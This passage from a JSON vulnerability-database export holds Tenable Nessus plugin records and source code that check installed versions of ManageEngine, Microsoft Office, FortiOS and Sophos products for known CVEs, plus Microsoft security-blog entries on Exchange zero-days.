\nIt is, therefore, affected by an authenticated remote code execution vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4907c125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Access Manager Plus version 4.3 Build 4303 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zoho Password Manager Pro XML-RPC Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_access_manager_plus\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_access_manager_plus_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Access Manager Plus\");\n script_require_ports(\"Services/www\", 7272);\n\n exit(0);\n}\n\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar appname = 'ManageEngine Access Manager Plus';\nvar port = get_http_port(default:7272, embedded:TRUE);\n\nvar app_info = vcf::zoho::fix_parse::get_app_info(app:appname, port:port);\n\nvar constraints = [\n { 'fixed_version' : '4303', 'fixed_display' : '4.3 Build 4303' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-10T10:48:00", "description": "The remote host is running a version of ManageEngine PAM360 prior to 5.5 Build 5510. It is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T00:00:00", "type": "nessus", "title": "ManageEngine PAM360 < 5.5 Build 5510 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_pam360"], "id": "MANAGEENGINE_PAM360_5510.NASL", "href": "https://www.tenable.com/plugins/nessus/166057", 
"sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166057);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2022-35405\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/13\");\n\n script_name(english:\"ManageEngine PAM360 < 5.5 Build 5510 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ManageEngine PAM360 prior to 5.5 Build 5510. It is, therefore, \naffected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this \nto bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n # https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4907c125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine PAM360 version 5.5 Build 5510 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Zoho Password Manager Pro XML-RPC Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_pam360\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_pam360_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine PAM360\");\n script_require_ports(\"Services/www\", 7272);\n\n exit(0);\n}\n\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar appname = 'ManageEngine PAM360';\nvar port = get_http_port(default:7272, embedded:TRUE);\n\nvar app_info = vcf::zoho::fix_parse::get_app_info(app:appname, port:port);\n\nvar constraints = [\n { 'fixed_version' : '5510', 'fixed_display' : '5.5 Build 5510' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-10T17:04:53", "description": "The remote host is running a version of ManageEngine Password Manager Pro prior to 12.1 Build 12101. It is, therefore, affected by a remote code execution vulnerability. 
An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T00:00:00", "type": "nessus", "title": "ManageEngine Password Manager Pro < 12.1 Build 12101 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/a:manageengine:password_manager_pro"], "id": "MANAGEENGINE_PMP_12101.NASL", "href": "https://www.tenable.com/plugins/nessus/166058", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166058);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2022-35405\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/13\");\n\n script_name(english:\"ManageEngine Password Manager Pro < 12.1 Build 12101 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ManageEngine Password Manager Pro prior to 12.1 Build 12101. \nIt is, therefore, affected by a remote code execution vulnerability. 
An unauthenticated, remote attacker \ncan exploit this to bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4907c125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Password Manager Pro version 12.1 build 12101 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zoho Password Manager Pro XML-RPC Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:manageengine:password_manager_pro\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_pmp_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Password Manager Pro\");\n script_require_ports(\"Services/www\", 7272);\n\n exit(0);\n}\n\ninclude('http_func.inc');\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar appname = 'ManageEngine Password Manager Pro';\nvar port = get_http_port(default:7272, embedded:TRUE);\n\nvar app_info = vcf::zoho::fix_parse::get_app_info(app:appname, port:port);\n\nvar constraints = [\n {'fixed_version': '12101', 'fixed_display' : '12.1 Build 12101'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:34:06", "description": "The Microsoft Office Products are missing security updates. It is, therefore, affected by a remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Office Products (October 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-11-29T00:00:00", "cpe": ["cpe:/a:microsoft:office"], "id": "SMB_NT_MS22_OCT_OFFICE.NASL", "href": "https://www.tenable.com/plugins/nessus/166037", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166037);\n 
script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/29\");\n\n script_cve_id(\"CVE-2022-38048\");\n script_xref(name:\"MSKB\", value:\"5002026\");\n script_xref(name:\"MSKB\", value:\"5002279\");\n script_xref(name:\"MSKB\", value:\"5002288\");\n script_xref(name:\"MSFT\", value:\"MS22-5002026\");\n script_xref(name:\"MSFT\", value:\"MS22-5002279\");\n script_xref(name:\"MSFT\", value:\"MS22-5002288\");\n script_xref(name:\"IAVA\", value:\"2022-A-0412-S\");\n\n script_name(english:\"Security Updates for Microsoft Office Products (October 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Office Products are affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Office Products are missing security updates. It is, therefore, affected by a remote code execution\nvulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5002026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5002279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5002288\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5002026\n -KB5002279\n -KB5002288\n\nFor Office 365, Office 2016 C2R, or Office 2019, ensure automatic\nupdates are enabled or open any office app and manually perform an\nupdate.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-38048\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_office.inc');\n\nvar bulletin = 'MS22-10';\nvar kbs = make_list(\n '5002026',\n '5002279',\n '5002288'\n);\nvar severity = SECURITY_HOLE;\n\nvar app_info = vcf::microsoft::office::get_app_info(app:'Microsoft Office', kbs:kbs, bulletin:bulletin, severity:severity);\n\nvar constraints = [\n {'product' : 'Microsoft Office 2013 SP1', 'kb':'5002279', 'file':'mso.dll', 'fixed_version': '15.0.5493.1000'},\n {'product' : 'Microsoft Office 2016', 'kb':'5002288', 'file':'mso.dll', 'fixed_version': '16.0.5365.1000'},\n {'product' : 'Microsoft Office 2016', 'kb':'5002026', 'file':'mso40uiwin32client.dll', 'fixed_version': '16.0.5365.1000'}\n];\n\nvcf::microsoft::office::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:severity,\n bulletin:bulletin,\n subproduct:'Office'\n);\n", 
"cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-24T15:16:55", "description": "The version of Fortigate installed on the remote host is 7.0.x prior to 7.0.7 or 7.2.x prior to 7.2.2. It is, therefore, affected by a vulnerability as referenced in the FG-IR-22-377 advisory:\n\n - An authentication bypass using an alternative path or channel in FortiOS and FortiProxy may allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTPS requests.\n (CVE-2022-40684)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-07T00:00:00", "type": "nessus", "title": "Fortinet Fortigate Authentication Bypass (FG-IR-22-377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2023-02-24T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIGATE_FG-IR-22-377.NASL", "href": "https://www.tenable.com/plugins/nessus/165763", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165763);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/24\");\n\n script_cve_id(\"CVE-2022-40684\");\n script_xref(name:\"IAVA\", value:\"2022-A-0401-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0032\");\n\n script_name(english:\"Fortinet Fortigate Authentication Bypass 
(FG-IR-22-377)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Fortinet Firewall is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Fortigate installed on the remote host is 7.0.x prior to 7.0.7 or 7.2.x prior to 7.2.2. It is,\ntherefore, affected by a vulnerability as referenced in the FG-IR-22-377 advisory:\n\n - An authentication bypass using an alternative path or channel in FortiOS and FortiProxy may allow an unauthenticated\n attacker to perform operations on the administrative interface via specially crafted HTTPS requests.\n (CVE-2022-40684)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.tenable.com/blog/cve-2022-40684-critical-authentication-bypass-in-fortios-and-fortiproxy\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3062e82\");\n # https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8df9e8be\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortigate version 7.0.7 / 7.2.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-40684\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Fortinet FortiOS, 
FortiProxy, and FortiSwitchManager authentication bypass.');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/version\", \"Host/Fortigate/model\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_fortios.inc');\n\nvar app_name = 'Fortigate';\nvar app_info = vcf::get_app_info(app:app_name, kb_ver:'Host/Fortigate/version');\n\nvcf::fortios::verify_product_and_model(product_name:app_name);\n\nvar constraints = [\n { 'min_version' : '7.0.0', 'fixed_version' : '7.0.7' },\n { 'min_version' : '7.2.0', 'fixed_version' : '7.2.2' }\n];\n\nvcf::fortios::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-26T20:51:31", "description": "A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v19.0 MR1 and older.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-23T00:00:00", "type": "nessus", "title": "Sophos XG Firewall <= 19.0.1 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-11-24T00:00:00", "cpe": ["cpe:/o:sophos:xg_firewall_firmware"], "id": "SOPHOS_XG_SOPHOS-SA-20220923-SFOS-RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/168124", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168124);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/24\");\n\n script_cve_id(\"CVE-2022-3236\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/14\");\n\n script_name(english:\"Sophos XG Firewall <= 19.0.1 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Sophos XG Firewall is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos \nFirewall version v19.0 MR1 and older.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e5db689\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3236\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/23\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sophos:xg_firewall_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_xg_firewall_detect.nbin\");\n script_require_keys(\"installed_sw/Sophos XG Firewall\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'Sophos XG Firewall';\nvar port = get_http_port(default:443);\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:TRUE);\n\n# Not checking hotfixes\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nvar constraints = [\n {'min_version':'0.0', 'max_version':'19.0.1', 'fixed_display':'See vendor advisory'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "msrc": [{"lastseen": "2022-11-08T18:46:25", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. 
We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. Summary On November 8 Microsoft released security updates \u2026\n\n[ Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server Read More \u00bb](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T06:55:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T06:55:00", "id": "MSRC:4F7507AA26F4DEB78152DE764136012C", "href": "https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-14T17:06:18", "description": "November 8, 2022 update - Microsoft released security updates for CVE-2022-41040 and CVE-2022-41082. We recommend that customers protect their organizations by applying the updates immediately to affected systems. The options described in the Mitigations section are no longer recommended. For more information, review the Exchange Team blog. 
Summary Summary On November 8 Microsoft released security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "msrc", "title": "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T07:00:00", "id": "MSRC:644966B4D83B650C284EC9D93664582D", "href": "/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-10-03T06:50:27", "description": "Microsoft Exchange Server contains an unspecified vulnerability which allows for authenticated remote code execution. 
